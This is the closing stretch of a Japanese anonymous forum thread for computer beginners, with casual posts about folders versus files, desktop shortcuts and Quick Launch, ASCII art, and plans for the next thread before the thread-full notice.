初心者向け、は終わったんだから、どうなろうとめいめい自分で始末しろってこった 露出しちゃうの以外は、どうにもならないってことはないだろ
万年初心者に簡単で効果的な方法を教えたが マジ疲れた… てかフォルダとファイルの違いくらい分かれつーの
厳密にはフォルダもファイルの一種です、 フォルダは特殊なファイルです とは説明してあげないの?
おっさんはフォルダのことをディレクトリと言います。
フォルダ風のexeをクリックするのはエロおやじ
>>981 ファイルとして開きたいお!とか言う人なら萌えられる
もう全部ショートカット化して デスクトップにアイコン並べれば良いと思うよ
きたねぇなぁ
デスクトップのアイコンが汚いので、マイコンピュータとゴミ箱だけ残して、あと全部Quick Launchへフォルダわけして置いている。 コレが意外とベンリでね。スタートメニューのショートカットも全部Quick Launchへ移動させているという。
そうですか
___ / || ̄ ̄|| ┌―.┐/ ̄\ |.....||__||―|――|‐⌒’|`⌒ それからどした・・・ | ̄ ̄\三⊂/ ̄ ̄ ̄/〇 | | ( ./ / __ / || ̄./ ̄\.┌―.┐ |.....||_⌒’|`⌒‐|┰┰|― それからどした!? | ̄ ̄\三⊂/ ̄ ̄ ̄/ | | ( ./ / / ̄\.┌―.┐♪ __ ⌒’|`♪‐|┰┰|‐∩ / || ̄ ̄|| r _. |⊂⊃| ノ それからどした? |.....||__|| └‐ ムムムムレ´`ヽ それからどした? | ̄ ̄\三 / ̄ ̄ ̄/ノ´` ♪ | | ( ./ / / ̄\. ⌒’|`⌒ ___ ♪ ∩┌―.┐ / || ̄ ̄|| _ ヽ‐|┰┰|‐7 それからどした?? |.....||__|| /`ヽJ ⊂⊃|┘ それからどした??? | ̄ ̄\三 / ̄ ̄ ̄/ ´`ヽ、ムムムム | | ( ./ / `) ) ♪
>>983 誰でも初心者の頃一回はやるものだと思ってた
で、次スレはインターネット板の方か? アフィテンプレのとこは無視の方向で。
もういらん
9.1.2がきたら表記帰るかと思ったらそうでもないのか 9.1.0でいいんですけどね
>>994 一番上はアフィ野郎のスレだから除外しとけ。
∩___∩ | ノ ,,.ノ ヽ、ヽ / u ― ― | | ( _●_) .| 困ったクマー 彡、 ヽノ ミ / ∩ノ ⊃ ヽ ( \ / _ノ | | .\ “ /__| | ○_○ _ \ /___ /_____(´(エ)`)__コマッタクマー _ _ _ _ _ _ _ __U _U _ | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | |
1000なら次々スレで「Vistaの人はは」が直りますように
1001 :
1001 :
Over 1000 Thread このスレッドは1000を超えました。 もう書けないので、新しいスレッドを立ててくださいです。。。